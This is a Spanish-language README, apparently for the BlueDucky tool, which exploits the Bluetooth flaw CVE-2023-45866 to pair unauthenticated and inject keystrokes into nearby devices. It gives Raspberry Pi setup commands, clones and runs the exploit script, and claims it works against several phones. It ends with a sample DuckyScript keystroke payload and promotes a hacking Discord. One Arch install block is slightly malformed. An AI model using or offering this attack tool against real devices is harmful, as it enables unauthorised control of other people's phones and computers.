
BlueDucky explota una vulnerabilidad Bluetooth, específicamente CVE-2023-45866, que permite a un atacante inyectar pulsaciones de teclado en un dispositivo objetivo. El dispositivo del atacante se hace pasar por un teclado Bluetooth para establecer una conexión cifrada sin autorización del usuario. La herramienta BlueDucky automatiza este proceso.
Gracias a todas las personas de HackNexus. ¡Asegúrate de unirte a nosotros en VC! https://discord.gg/HackNexus
NOTAS: No podré ejecutar esto en una computadora portátil u otro dispositivo fuera de una Raspberry Pi para realizar pruebas. Debido a esto, cualquier problema que tengas deberá resolverse entre ustedes, ya que no tengo fondos adicionales para comprar un adaptador.
🚨 CVE-2023-45866 - Implementación de BlueDucky (Usando DuckyScript)
🔓 Emparejamiento no autenticado que lleva a Ejecución de Código (Usando Teclado HID)
Esta es una implementación del CVE descubierto por marcnewlin
BlueDucky es una poderosa herramienta para explotar una vulnerabilidad en dispositivos Bluetooth. Al ejecutar este script, puedes:
He ejecutado esto con éxito en una Raspberry Pi 4 usando el módulo Bluetooth predeterminado. Funciona contra varios teléfonos, con una excepción interesante para una marca de Nueva Zelanda, Vodafone.
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
# update pacman & packages
sudo pacman -Syyu
# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
python-setuptools python-pydbus python-dbus
git gcc python-pip \
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py
alternativamente,
pip3 install -r requirements.txt
🚧 Trabajo en progreso:
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300